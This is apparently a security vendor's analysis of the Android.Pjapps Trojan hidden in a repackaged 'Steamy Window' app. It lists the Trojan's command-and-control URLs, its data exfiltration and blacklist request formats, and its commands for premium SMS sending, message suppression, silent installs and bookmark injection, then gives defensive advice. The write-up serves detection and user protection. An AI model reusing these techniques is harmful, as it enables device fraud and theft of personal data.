Android Threats Getting Steamy

As seen in recent blog postings, Android malware is on the rise. Android.Pjapps is another example of a Trojan with back door capabilities that targets Android devices. As seen with previous Android threats, it is spreading through compromised versions of legitimate applications, available on unregulated third-party Android marketplaces.

We have detected a few applications carrying Android.Pjapps code. One of these applications is Steamy Window. Similar to other compromised Android applications, it is difficult to differentiate the legitimate version from the malicious one once it is installed. However, during installation it is possible to identify the malicious version by the excessive permissions it requests. The images below show the installation process of a clean Steam Window application and a malicious one.

When run, both the legitimate and malicious version of the application mimic a steam effect on your Android device’s screen. It even lets you wipe it off with your finger as seen in the image below:

However, the malicious version has added additional functionality. The screenshot below shows how the original application’s manifest has been changed:

The aim of Android.Pjapps is to build a botnet controlled by a number of different Command and Control (C&C) servers. Among other things, it is able to install applications, navigate to websites, add bookmarks to your browser, send text messages, and optionally block text message responses.
The threat registers its own service to operate in the background without the user noticing. The service will be started whenever the signal strength of the infected mobile changes and it tries to connect to the following C&C server to register the infection:

http://mobile.meego91.com/mm.do?..{parameters}

Along with this request, it sends sensitive information obtained from the device, including:

It then awaits for a response, and if commanded it will send a message with the infected device’s IMEI number to a mobile number obtained from the following URL:

http://log.meego91.com:9033/android.log?{parameters}

This mobile number is meant to be controlled by the attacker. By using this technique the attacker hides his identity within the “cloud”.

The malicious service also periodically checks the C&C server using the URL below to pull down commands:

http://xml.meego91.com:8118/push/newandroidxml/...

Android.Pjapps uses an XML-based protocol which basically defines tasks (or commands) to be performed at certain times, it supports the following commands:

note
This command is most probably meant to be used to send text messages to premium-rate numbers. A mobile number and content have to be specified, and two additional actions can be performed:

  • blacklisting—If specified, the mobile’s number will be sent to a remote server to check whether it has been blacklisted, in which case the message won’t be sent. The URL of the service has to be sent as a parameter to the command and the blacklist check will be performed issuing a request with the following format:

    ($blacklist_url) + "/?tel=" + mobilenumber
     

  • response blocking—Android.Pjapps also listens for incoming messages, this allows the note command to specify rules to drop inbound messages if certain conditions are met, so the user doesn’t read them. Beginning and end-of-message strings are among the supported filters.

push
This command performs SMS-spamming and requires the following parameters:

  • <smscontent>—Content of the text message
  • <smsurl>—A URL to add at the end of the message contents
  • <tel>—Mobile numbers to send the text to, separated by '#'

It also supports a check for blacklisted devices. In this case the action is performed issuing the following request:

($blacklist_url) + "/sim?=" + imei

soft
This command is used to install packages on to the compromised device. The packages are downloaded from a remote URL that has to be sent along with the command as a parameter.

window
This command makes the mobile navigate to a given website. Android.Pjapps has a preference of which browser to use, checking for the presence of the following browsers:

  • com.uc.browser
  • com.tencent.mtt
  • com.opera.mini.android
  • mobi.mgeek.TunnyBrowser
  • com.skyfire.browser
  • com.kolbysoft.steel
  • com.android.browser

mark
The mark command is used to add bookmarks to the compromised device. When the service is first launched, Android.Pjapps may also, by default, add the following bookmarks to the device:

  • android.paojiao.cn
  • ct2.paojiao.cn
  • g3g3.cn

xbox
This command has been found in Android.Pjapps parsing code but it seems to be unimplemented.

None of the domains listed above seem to be active at the moment, so we haven’t had the chance to inspect the traffic between Android.Pjapps and its C&C servers. However, looking at the threat’s capabilities we believe it has been designed to push advertisement campaigns and to reap the benefits from compromised devices using third-party, premium-rate services.

To avoid becoming a victim of such malicious Android applications, we recommend that you only use regulated Android marketplaces for downloading and installing Android applications. Also, in the Android OS application settings there is an option to stop the installation of non-market applications, which can help to prevent against this type of attack. Checking user comments on the marketplace can also assist in determining if the application is safe. Lastly, always check the access permissions being requested during the installation of any Android applications. If they seem excessive for what the application is designed to do, it would be wise to stop installing the application.